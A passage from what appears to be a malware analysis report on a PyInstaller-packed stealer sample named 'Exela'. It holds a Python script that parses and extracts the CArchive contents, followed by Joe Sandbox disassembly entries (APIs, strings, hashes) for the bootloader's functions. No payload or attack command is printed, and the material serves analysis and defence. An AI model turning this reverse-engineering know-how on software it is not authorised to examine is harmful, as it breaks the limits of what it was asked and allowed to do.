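def parse_archive(data: bytes) -> Archive:
    # Search from the end: a signature or other appended data may follow the cookie.
    cookie_pos = data.rfind(MAGIC)
    if cookie_pos < 0 or len(data) - cookie_pos < COOKIE_SIZE:
        raise ValueError("no complete PyInstaller cookie found")
    _, pkg_len, toc_off, toc_len, pyver, pylib = struct.unpack(
        COOKIE_FMT, data[cookie_pos:cookie_pos + COOKIE_SIZE])
    start = cookie_pos + COOKIE_SIZE - pkg_len   # pkg_len covers data, TOC and the cookie itself
    if start < 0 or start + toc_off + toc_len > cookie_pos:
        raise ValueError("cookie describes an archive that does not fit the file")
    toc = data[start + toc_off:start + toc_off + toc_len]
    entries, i = [], 0
    while i + ENTRY_SIZE <= len(toc):
        elen, off, clen, ulen, cflag, tc = struct.unpack(ENTRY_FMT, toc[i:i + ENTRY_SIZE])
        if elen < ENTRY_SIZE or i + elen > len(toc):
            raise ValueError("corrupt TOC entry at offset %d" % i)
        name = toc[i + ENTRY_SIZE:i + elen].rstrip(b"\x00").decode("utf-8", "replace")
        entries.append(TocEntry(name, chr(tc), off, clen, ulen, bool(cflag)))
        i += elen
    return Archive(start, pyver, pylib.rstrip(b"\x00").decode(), entries)


def extract(data: bytes, archive: Archive, entry: TocEntry) -> bytes:
    blob = data[archive.start + entry.offset:archive.start + entry.offset + entry.packed_len]
    return zlib.decompress(blob) if entry.compressed else blob


def startup_scripts(archive: Archive) -> List[str]:
    """Type 's' entries are the scripts the bootloader runs: the first place to look for stealer logic."""
    return [e.name for e in archive.entries if e.typecode == "s"]


def _toc_entry(name: str, offset: int, clen: int, ulen: int, cflag: int, typecode: str) -> bytes:
    raw_name = name.encode() + b"\x00"
    length = ENTRY_SIZE + len(raw_name)
    length += (-length) % 16                 # PyInstaller pads every entry to a 16-byte boundary
    return struct.pack(ENTRY_FMT, length, offset, clen, ulen, cflag, ord(typecode)) + \
        raw_name.ljust(length - ENTRY_SIZE, b"\x00")


def build_sample_file() -> bytes:
    """Constructed stand-in for a packed executable: a fake stub followed by a three-entry CArchive."""
    stub = b"MZ" + b"\x00" * 126 + b"(constructed stub, not a real PE)"
    script = b'print("hello from the startup script")\n'
    pyz = b"PYZ\x00constructed-pyz-bytes"
    items = [("pyi-disable-windowed-traceback", b"", 0, 0, "o"),   # runtime option: name only
             ("main", zlib.compress(script), len(script), 1, "s"),
             ("PYZ-00.pyz", pyz, len(pyz), 0, "z")]
    data = toc = b""
    for name, blob, ulen, cflag, tc in items:
        toc += _toc_entry(name, len(data), len(blob), ulen, cflag, tc)
        data += blob
    pkg_len = len(data) + len(toc) + COOKIE_SIZE
    cookie = struct.pack(COOKIE_FMT, MAGIC, pkg_len, len(data), len(toc), 311, b"python311.dll")
    return stub + data + toc + cookie


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_file()
    arc = parse_archive(blob)
    print("archive at 0x%x, Python %d.%d (%s)" % ((arc.start,) + python_version_tuple(arc.python_version) + (arc.python_lib,)))
    for e in arc.entries:
        print("%-34s %s %7d -> %7d  %s" % (e.name, e.typecode, e.packed_len, e.raw_len, TYPECODES.get(e.typecode, "?")))
```

Run it with a file path to list a real sample's table of contents; with no arguments it parses the constructed archive. Searching for the cookie from the end of the file, instead of assuming it occupies the last 88 bytes, is what keeps this working on samples that carry an Authenticode signature or other data appended after the archive. The Python version read from the cookie is the version needed to decompile the .pyc members of the PYZ once they are pulled out; the type 's' entries are the scripts the bootloader runs and are where the stealer's own logic normally starts.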

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    • Graph (rendered in the original report) for the function at 7ff75aeb5c70-7ff75aeb617c. GetTimeZoneInformation is the only Windows API it calls directly (from the block at 7ff75aeb5f49); the remaining calls are the CRT routines listed under APIs below (_get_daylight, _invalid_parameter_noinfo and the heap free path), 7ff75aeba540, 7ff75aeb5b8c, 7ff75aea6bc8, 7ff75aeb2bcc, 7ff75aeb6184, 7ff75aeb5eec and 7ff75ae9c5c0, and a recursive call to 7ff75aeb5c70 from the block at 7ff75aeb6174.
                                                                                                    APIs
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF75AEB5CB5
                                                                                                      • Part of subcall function 00007FF75AEB5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF75AEB561C
                                                                                                      • Part of subcall function 00007FF75AEAA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF75AEB2D92,?,?,?,00007FF75AEB2DCF,?,?,00000000,00007FF75AEB3295,?,?,?,00007FF75AEB31C7), ref: 00007FF75AEAA9CE
                                                                                                      • Part of subcall function 00007FF75AEAA9B8: GetLastError.KERNEL32(?,?,?,00007FF75AEB2D92,?,?,?,00007FF75AEB2DCF,?,?,00000000,00007FF75AEB3295,?,?,?,00007FF75AEB31C7), ref: 00007FF75AEAA9D8
                                                                                                      • Part of subcall function 00007FF75AEAA970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF75AEAA94F,?,?,?,?,?,00007FF75AEAA83A), ref: 00007FF75AEAA979
                                                                                                      • Part of subcall function 00007FF75AEAA970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF75AEAA94F,?,?,?,?,?,00007FF75AEAA83A), ref: 00007FF75AEAA99E
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF75AEB5CA4
                                                                                                      • Part of subcall function 00007FF75AEB5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF75AEB567C
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF75AEB5F1A
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF75AEB5F2B
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF75AEB5F3C
                                                                                                    • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF75AEB617C), ref: 00007FF75AEB5F63
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                    • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                    • API String ID: 4070488512-239921721
                                                                                                    • Opcode ID: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                    • Instruction ID: 693fde1b50c7a2a4b3a3d98dc106139f1c519a3e5693e51a6896f1a163118426
                                                                                                    • Opcode Fuzzy Hash: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                    • Instruction Fuzzy Hash: 7CD1B032A0836686FB20FF25D45A1B9A751EF44784FCC8276EA4E47695DF3CE8428770

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    • Graph (rendered in the original report) for the function at 7ff75aeb69d4-7ff75aeb6dc2. CreateFileW is issued from three blocks (7ff75aeb6a86, 7ff75aeb6aff and 7ff75aeb6d0c, the last immediately after a CloseHandle); the returned handle is checked with GetFileType, and each failure path reads GetLastError and calls 7ff75aea4eec, in one case followed by CloseHandle and in another by 7ff75aea86d0. Other internal calls: 7ff75aeb6708, 7ff75aea8590, 7ff75aea4f58, 7ff75aea4f78, 7ff75aea84a8, 7ff75aeb6488, 7ff75aeb6910 and 7ff75aeaab30.
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                    • String ID:
                                                                                                    • API String ID: 1617910340-0
                                                                                                    • Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                    • Instruction ID: ee3efea50d0d48c4bde0f0a6c6a8b7b33c35aff29d8b17df749b4ce14cdfd268
                                                                                                    • Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                    • Instruction Fuzzy Hash: 20C1EF32B28A6986FB10EFA4C4962AC7761FB49B98F885375DB6E57394CF38D411C310

Control-flow Graph

APIs
• FindFirstFileW.KERNELBASE(?,00007FF75AE98B09,00007FF75AE93FA5), ref: 00007FF75AE9841B
• RemoveDirectoryW.KERNEL32(?,00007FF75AE98B09,00007FF75AE93FA5), ref: 00007FF75AE9849E
• DeleteFileW.KERNELBASE(?,00007FF75AE98B09,00007FF75AE93FA5), ref: 00007FF75AE984BD
• FindNextFileW.KERNELBASE(?,00007FF75AE98B09,00007FF75AE93FA5), ref: 00007FF75AE984CB
• FindClose.KERNEL32(?,00007FF75AE98B09,00007FF75AE93FA5), ref: 00007FF75AE984DC
• RemoveDirectoryW.KERNELBASE(?,00007FF75AE98B09,00007FF75AE93FA5), ref: 00007FF75AE984E5
Strings
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
• String ID: %s\*
• API String ID: 1057558799-766152087
• Opcode ID: 39a93d91a788addd72801eeb202cf5dd5373a6ceabdc1da620128e14205563d9
• Instruction ID: 709c6038febe3ce181d98b084f7fc6d58cae5cb6ff821833daea625e506cd7e4
• Opcode Fuzzy Hash: 39a93d91a788addd72801eeb202cf5dd5373a6ceabdc1da620128e14205563d9
• Instruction Fuzzy Hash: E741A431A0C76699FA20BB24E44A9BDA760FF94750FC80276D95D436E4DF3CD946CB20

Control-flow Graph

APIs
• _get_daylight.LIBCMT ref: 00007FF75AEB5F1A
  • Part of subcall function 00007FF75AEB5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF75AEB567C
• _get_daylight.LIBCMT ref: 00007FF75AEB5F2B
  • Part of subcall function 00007FF75AEB5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF75AEB561C
• _get_daylight.LIBCMT ref: 00007FF75AEB5F3C
  • Part of subcall function 00007FF75AEB5638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF75AEB564C
  • Part of subcall function 00007FF75AEAA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF75AEB2D92,?,?,?,00007FF75AEB2DCF,?,?,00000000,00007FF75AEB3295,?,?,?,00007FF75AEB31C7), ref: 00007FF75AEAA9CE
  • Part of subcall function 00007FF75AEAA9B8: GetLastError.KERNEL32(?,?,?,00007FF75AEB2D92,?,?,?,00007FF75AEB2DCF,?,?,00000000,00007FF75AEB3295,?,?,?,00007FF75AEB31C7), ref: 00007FF75AEAA9D8
• GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF75AEB617C), ref: 00007FF75AEB5F63
Strings
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
• String ID: Eastern Standard Time$Eastern Summer Time
• API String ID: 3458911817-239921721
• Opcode ID: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
• Instruction ID: 434c2a0d6dcaf9cf54c9a4d6a32f24e3b50ce587ed8d484ceb3794a820684f46
• Opcode Fuzzy Hash: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
• Instruction Fuzzy Hash: 2551A432A0876686F760FF25E5975A9E350BF48784FCC4279EA4D43696DF3CE8018760
APIs
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
• Instruction ID: d28007797e316ee1e134623854a8434a5f6d3804ae729b7e3fa2ae69a2b0a515
• Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
• Instruction Fuzzy Hash: 57F0C822A187518AF760BF60B45A76AB350AF84324F8C4335D9AD027E4DF3CD4488A10
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: CurrentFeaturePresentProcessProcessor
• String ID:
• API String ID: 1010374628-0
• Opcode ID: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
• Instruction ID: 2eee3a1608a7673bd6efa5f382ff8a6b701f9dfea337a90977b599691ea146da
• Opcode Fuzzy Hash: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
• Instruction Fuzzy Hash: 4202AC21B0D77A41FAA6BB11A44B279A690AF45BA0FCD87B4DD5D473D2DE3DB8018330

Control-flow Graph

APIs
  • Part of subcall function 00007FF75AE97F80: _fread_nolock.LIBCMT ref: 00007FF75AE9802A
• _fread_nolock.LIBCMT ref: 00007FF75AE91A1B
  • Part of subcall function 00007FF75AE92910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF75AE91B6A), ref: 00007FF75AE9295E
Strings
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: _fread_nolock$CurrentProcess
• String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
• API String ID: 2397952137-3497178890
• Opcode ID: 7f967e8bf4bd65ccd330245f6cf3beef5728b9bf280203bc786e936cb306ff0d
• Instruction ID: 58affc7623e1bb6c5573197db563d731b501ef89910778927b89facaf8a57c6b
• Opcode Fuzzy Hash: 7f967e8bf4bd65ccd330245f6cf3beef5728b9bf280203bc786e936cb306ff0d
• Instruction Fuzzy Hash: D481D671A0C7A68AFB60FB14D4466F9A390EF48784FC84171EA4D43786DE3CE5858760

Control-flow Graph

Strings
Memory Dump Source
• Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
• Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
• API String ID: 2050909247-1550345328
• Opcode ID: 607fb3d22e1abd3d0ea9d943795872ea3e60594e8e3d1f768179a624c21a25df
• Instruction ID: 776d906da119d5d27130256d0e3fb402130479796d512671bfd60679ec5532e4
• Opcode Fuzzy Hash: 607fb3d22e1abd3d0ea9d943795872ea3e60594e8e3d1f768179a624c21a25df
• Instruction Fuzzy Hash: 5651BD61F087678AFA10BB11A8069B9E390BF45794FCC46B1EE0C07792DF3CE9459360

Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetTempPathW.KERNEL32(?,?,00000000,00007FF75AE93CBB), ref: 00007FF75AE988F4
                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,00007FF75AE93CBB), ref: 00007FF75AE988FA
                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00007FF75AE93CBB), ref: 00007FF75AE9893C
                                                                                                      • Part of subcall function 00007FF75AE98A20: GetEnvironmentVariableW.KERNEL32(00007FF75AE9388E), ref: 00007FF75AE98A57
                                                                                                      • Part of subcall function 00007FF75AE98A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF75AE98A79
                                                                                                      • Part of subcall function 00007FF75AEA82A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF75AEA82C1
                                                                                                      • Part of subcall function 00007FF75AE92810: MessageBoxW.USER32 ref: 00007FF75AE928EA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                    • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                    • API String ID: 3563477958-1339014028
                                                                                                    • Opcode ID: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
                                                                                                    • Instruction ID: 9db4264300ae4e75d5aa598b8ac555c918be469d190e502191a7670588a82f47
                                                                                                    • Opcode Fuzzy Hash: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
                                                                                                    • Instruction Fuzzy Hash: B341A011A1976249FA24FB25A85B6FAD390AF88780FCC51B1ED0D477E6DE3CE901C320

                                                                                                    Control-flow Graph

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentProcess
                                                                                                    • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                    • API String ID: 2050909247-2813020118
                                                                                                    • Opcode ID: 15fc9c742c9fb12a8c4ab664e8e5c311509e27342d3a39e207e1bde7a43e7c65
                                                                                                    • Instruction ID: 18baeaa694f97a44c889729e513fec92477014abfdaf4d8995048c13593bb700
                                                                                                    • Opcode Fuzzy Hash: 15fc9c742c9fb12a8c4ab664e8e5c311509e27342d3a39e207e1bde7a43e7c65
                                                                                                    • Instruction Fuzzy Hash: 2D51B322A0876249FA60BB11A8427BAE2D1BF85794FCC4275EE4D477D5EF3CE905C720

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF75AEAF11A,?,?,-00000018,00007FF75AEAADC3,?,?,?,00007FF75AEAACBA,?,?,?,00007FF75AEA5FAE), ref: 00007FF75AEAEEFC
                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF75AEAF11A,?,?,-00000018,00007FF75AEAADC3,?,?,?,00007FF75AEAACBA,?,?,?,00007FF75AEA5FAE), ref: 00007FF75AEAEF08
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeLibraryProc
                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                    • API String ID: 3013587201-537541572
                                                                                                    • Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                    • Instruction ID: 1479b542e1a2af95a6064b22553ed0382c5e96f1f9a9fe4f68f37d8c80ae1959
                                                                                                    • Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                    • Instruction Fuzzy Hash: ED411621B19B3281FA16FB16981A675A391BF48B90FCD8579ED1D47384EF3CE805C360

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetModuleFileNameW.KERNEL32(?,00007FF75AE93804), ref: 00007FF75AE936E1
                                                                                                    • GetLastError.KERNEL32(?,00007FF75AE93804), ref: 00007FF75AE936EB
                                                                                                      • Part of subcall function 00007FF75AE92C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF75AE93706,?,00007FF75AE93804), ref: 00007FF75AE92C9E
                                                                                                      • Part of subcall function 00007FF75AE92C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF75AE93706,?,00007FF75AE93804), ref: 00007FF75AE92D63
                                                                                                      • Part of subcall function 00007FF75AE92C50: MessageBoxW.USER32 ref: 00007FF75AE92D99
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004C.00000002.2109077931.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004C.00000002.2108988616.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109172912.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109274929.00007FF75AED2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 0000004C.00000002.2109451009.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_76_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                    • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                    • API String ID: 3187769757-2863816727
                                                                                                    • Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                    • Instruction ID: f76858c276dbdf7e7f1cb10ce940f0214e8e4bf1483fa9fa06be43151ebf1972
                                                                                                    • Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                    • Instruction Fuzzy Hash: 7521C751B1C76395FA20B724E8177BAA250BF88744FC842B6E55DC25E5EE3CE905C320

                                                                                                    Control-flow Graph

                                                                                                    APIs
